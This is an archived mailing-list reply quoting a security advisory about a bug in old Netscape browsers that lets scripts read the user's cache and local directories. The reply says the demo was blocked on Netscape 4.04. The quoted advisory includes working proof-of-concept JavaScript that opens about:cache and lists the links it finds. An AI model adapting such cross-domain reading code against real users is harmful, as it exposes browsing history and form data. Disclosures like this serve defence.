FYI: I run Netscape 4.04 and this is what I got trying that link: JavaScript Error: file:/c|/, line 2: access disallowed from scripts at http://www.geocities.com/ResearchTriangle/1711/b5.html to documents at another domain. Ian Georgi Guninski wrote: > There is a bug in Netscape Communicator 4.5, 4.07, 3.04 under Windows 95 > (probably others) which allows reading user's cache (the urls the user > has > visited, including the info in GET forms). Reading local directories > content > is also allowed. This info may be sent to an arbitrary host. > The bug may be exploited by email. > > Demonstration is available at: > Cache reading: http://www.geocities.com/ResearchTriangle/1711/b4.html > Directory reading: > http://www.geocities.com/ResearchTriangle/1711/b5.html > > The javascript code is: > > sl=window.open('wysiwyg://1/about:cache'); > //For Netscape 3.04 remove 'wysiwyg://1/' > sl2=sl.window.open(); > sl2.location="javascript:function f() {s='<SCRIPT>cr=\"\t \"; x=\"Here > are some links from your cache:\"; for(i=0;i<5;i++) > x+=opener.document.links[i]+cr;alert(x);</'+'SCRIPT>';return s};f()"; > sl2.location.reload(); > > Workaround: Disable Javascript. > > Regards, > Georgi Guninski > http://www.geocities.com/ResearchTriangle/1711/ > > ______________________________________________________ > Get Your Private, Free Email at http://www.hotmail.com
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:21:32 PDT